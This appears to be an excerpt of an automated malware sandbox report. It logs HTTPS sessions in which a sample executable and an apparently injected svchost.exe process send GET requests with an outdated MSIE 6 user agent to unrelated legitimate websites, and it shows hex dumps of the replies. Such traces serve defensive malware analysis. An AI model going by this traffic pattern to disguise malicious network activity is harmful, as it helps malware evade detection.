                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC444INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      24192.168.2.561785172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC336OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: orlyhotel.com
                                                                                                                                                                                                                                                                                                      Cookie: django_language=en
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC529INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:34:59 GMT
                                                                                                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:34:59 GMT
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Vary: Accept-Language
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MApDs%2FoF5947Fly5PhhzZZaHypw%2Ba%2BuiN6tVFiMpbJJ7jbfVoCMUMQHccV6wp4KjHZ1xz1g6%2FE7cIUtzqEaHodIhlaY5VPoRUFep0Bk7JknKAtaljNIUS9gTP3M14flk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc8856cd530f3-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC530INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC530INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      25192.168.2.561710188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC336OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC351INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:55:06 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKvpRAzTjf8Min6nZX1DtPNugVJuzJuCx5cz848gWAL%2B9RKZuGV4rUJu0heVVJrTtDiqcCCyD7itDJYgTJmqYowv%2FAeQWXtscwfj47Tt28HMnti0NLUCNXxL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc8856cee3618-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC351INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC352INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      26192.168.2.562418188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC336OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC338INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K72dAt%2FWEmUAaCRdM3WAlwSVUbyms%2BbVjxvb7oQSNNi3Op6bmbfchCcbvBZFKWoOUK4Rt7TU6pqm7uv1cRUrIGt4lCPYv%2BL5i1ensmJA%2BF1TMTj3JZ1vyAd7kfZL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc8857c8cbbcb-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC339INData Raw: 31 65 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e7d<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Comp
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC339INData Raw: 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: atible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC341INData Raw: 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 52 31 56 38 74 6c 41 56 5a 4d 59 39 4a 31 73 45 4f 46 66 76 6b 6d 4e 49 36 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
                                                                                                                                                                                                                                                                                                      Data Ascii: gtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=R1V8tlAVZMY9J1sEOFfvkmNI6z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCOU" method="POST" enctype="application/x
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC342INData Raw: 66 64 7a 7a 4e 6e 73 44 54 54 35 58 66 65 64 50 52 72 68 71 45 41 4f 56 4a 67 74 49 54 53 72 6a 52 64 56 74 77 57 4e 6e 46 44 30 79 56 64 61 6b 59 6c 58 30 68 79 48 79 5f 59 56 2d 47 4a 56 44 30 4b 37 72 49 49 59 4f 38 44 6b 30 66 56 4c 39 32 6d 66 6c 4f 69 34 7a 48 2d 30 49 54 47 48 68 42 2d 53 37 4a 38 4c 64 66 43 57 31 59 7a 36 68 44 79 41 34 66 64 4c 36 62 69 37 32 53 72 79 4a 62 67 5a 6e 6e 48 78 6d 56 58 54 71 56 64 46 4f 41 79 6b 67 6b 37 45 4c 57 72 2d 37 6b 7a 41 65 59 68 5a 34 43 31 30 70 63 61 4d 59 35 31 59 54 7a 30 47 73 33 44 65 46 33 72 4a 58 68 34 4d 2d 2d 4e 51 41 6c 57 51 62 4f 7a 48 5a 46 56 44 34 43 30 52 79 54 39 46 4c 73 38 5f 50 74 51 50 6e 30 63 43 30 35 7a 4e 64 6d 5a 6e 76 6e 4e 4b 70 46 39 6a 38 74 72 66 66 36 65 41 33 7a 78 4c
                                                                                                                                                                                                                                                                                                      Data Ascii: fdzzNnsDTT5XfedPRrhqEAOVJgtITSrjRdVtwWNnFD0yVdakYlX0hyHy_YV-GJVD0K7rIIYO8Dk0fVL92mflOi4zH-0ITGHhB-S7J8LdfCW1Yz6hDyA4fdL6bi72SryJbgZnnHxmVXTqVdFOAykgk7ELWr-7kzAeYhZ4C10pcaMY51YTz0Gs3DeF3rJXh4M--NQAlWQbOzHZFVD4C0RyT9FLs8_PtQPn0cC05zNdmZnvnNKpF9j8trff6eA3zxL
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC343INData Raw: 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 34 39 31 30 35 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 38 38 35 37 63 38 63 62 62 63 62 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 38 66 31 62 38 65 65 34 65 35 62 33 35 66 36 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 52 31 56 38 74 6c 41 56 5a 4d 59 39 4a 31 73 45 4f 46 66 76 6b 6d 4e 49 36 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f
                                                                                                                                                                                                                                                                                                      Data Ascii: 'sigtoa.com', cType: 'managed', cNounce: '49105', cRay: '7abbc8857c8cbbcb', cHash: '8f1b8ee4e5b35f6', cUPMDTk: "\/?__cf_chl_tk=R1V8tlAVZMY9J1sEOFfvkmNI6z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCO
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC345INData Raw: 70 33 53 36 37 63 4b 6c 58 73 69 2b 42 38 39 51 49 57 4a 68 35 79 49 38 57 69 44 6c 36 66 49 61 42 6f 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 62 62 35 49 31 45 7a 6e 79 4c 53 39 44 63 57 4a 75 55 45 4a 6a 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 4a 50 54 6f 30 36 2f 79 61 32 74 38 50 38 77 6a 55 43 38 5a 34 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57
                                                                                                                                                                                                                                                                                                      Data Ascii: p3S67cKlXsi+B89QIWJh5yI8WiDl6fIaBo=', i1: 'bb5I1EznyLS9DcWJuUEJjA==', i2: 'JPTo06/ya2t8P8wjUC8Z4Q==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44W
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC346INData Raw: 7a 34 4a 75 45 43 37 6d 34 58 6b 41 78 69 64 4c 58 38 2d 31 36 37 39 34 36 30 33 30 36 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 4f 55 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64
                                                                                                                                                                                                                                                                                                      Data Ascii: z4JuEC7m4XkAxidLX8-1679460306-0-gaNycGzNCOU" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC347INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      27192.168.2.562444138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC336OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC347INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 548
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC347INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      28192.168.2.562415172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: orlyhotel.com
                                                                                                                                                                                                                                                                                                      Cookie: django_language=en
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC564INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:34:59 GMT
                                                                                                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:34:59 GMT
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Vary: Accept-Language
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TIJKQkauURkOoJkkGoPFAM1s%2Fizv0g9pVuIiaeG5kNMh0MqQ8u8be2cw5Q%2F8eszJW8hf%2FHY%2BgeQy3LbClSY6XfEeqMSqW0v0P%2FypOA6feh0XGDispNG1YZaJ3sXC9h0z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc885bf0a2c46-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC564INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC564INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      29192.168.2.56241791.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC348OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC463INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:52 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
